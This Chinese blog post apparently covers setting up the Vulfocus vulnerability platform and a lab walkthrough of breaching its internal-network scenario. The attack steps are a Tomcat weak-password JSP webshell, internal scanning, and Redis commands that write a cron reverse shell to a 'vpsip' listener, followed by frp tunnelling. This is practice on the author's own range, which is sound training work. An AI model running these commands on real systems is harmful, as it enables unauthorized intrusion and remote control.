前言
Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用,这里我们搭建在云服务器上,需要高一点的配置,搭建可以按需搭建本地和自己的服务器上,我们主要使用场景编排功能进行内网突破训练,多重内网的穿透等。
一、搭建
vulfocus:https://github.com/fofapro/vulfocus 在服务器中已经安装docker:直接拉取镜像到本地
docker pull vulfocus/vulfocus:latest
拉取成功 启动容器:
将自己的IP替换xx.xx.xx.xx
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xx.xx.xx.xx vulfocus/vulfocus
访问web界面: 默认用户名密码为admin: 这里是公网服务器所以改密码: ![在这里插入图片描述](https://img-blog.csdnimg.cn/96a0060b889843c6bd2ba7e0965c65c1.png)
二、使用
我们需要下载文件才能进行使用: 下载需要的镜像文件: 下载完成后在docker images中可以看到
我们使用这几个镜像编排一个简单场景题:
三、场景靶场编排
先添加网卡作为内网使用: 这里我添加一个network3的网卡: 添加场景: 这里注意需要拖出来不能点: 选择我们刚才下载的镜像文件: 这里我们用tomcat弱密码作为边缘机也就是外网可以访问到的服务器: 网卡使用network3: 第二台给一个redis的未授权访问漏洞作为内网靶机:
注意:这里是否开放这里不选(不选就作为内网) 我们这里将图片截图保存一下: 写一个描述: 发布靶场: 这里是公网的地址码一下: 访问靶场: 这里我们的搭建过程就好了,就可以叫上小伙伴一起打靶场了。
四、靶场实战
这里是tomcat弱密码直接上传jsp马: 注意jsp马需要压缩为zip后将后缀改为war包才能上传 访问一下马: 直接用冰蝎连接: 用的默认密码: 拿到第一个flag: 看一下权限: 然后在找其他flag: 查一下内网ip 上传一个fscan作信息搜集: 扫描一下内网: 扫描完成后会生成一个文件 可以看到另外两台内网: 我们简单用冰蝎做个内穿(不稳定): ![在这里插入图片描述](https://img-blog.csdnimg.cn/013af494ba68448bbecdb8a60c6baa48.png)
开个kali使用redis的cli连接测试: 注意我本机地址为10.102.114.135也就是上面映射Windows11的地址,因为kali是虚拟机所以这里需要修改为本机ip 这里我们使用任务计划反弹shell,准备一台vps(公网IP): 监听端口: 使用redis-cli写入任务计划:
redis-cli -h 10.102.114.135
这里替换vpsip和端口
set x "\n* * * * * bash -i >& /dev/tcp/vpsip/1212 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
发现无法写入进入容器查看: 发现没有装任务计划程序: 第二种方式写入webshell,发现也灭有装web服务我先装一个任务计划,不然没法实现: apt-get源无法使用,这下这两种方式就不行了,换源后出现新问题放弃使用这种方式: 这里放弃这种代理方式使用frp搭建隧道实现本机可以访问redis: 使用云主机搭建frp server ![在这里插入图片描述](https://img-blog.csdnimg.cn/6c8fcbb0efd54d559c8577f9a237f78a.png)
启动
.\frps -c frps.ini
利用冰蝎上传frpc 写配置: 本地使用代理访问: 这里是公网ip 访问一下内网服务:使用内网ip访问 成功打通第一层隧道 ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa84d2060d064ccdb4051bbce6f28fea.png)
接下来就可以使用poc去测试了。
五、总结
构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
|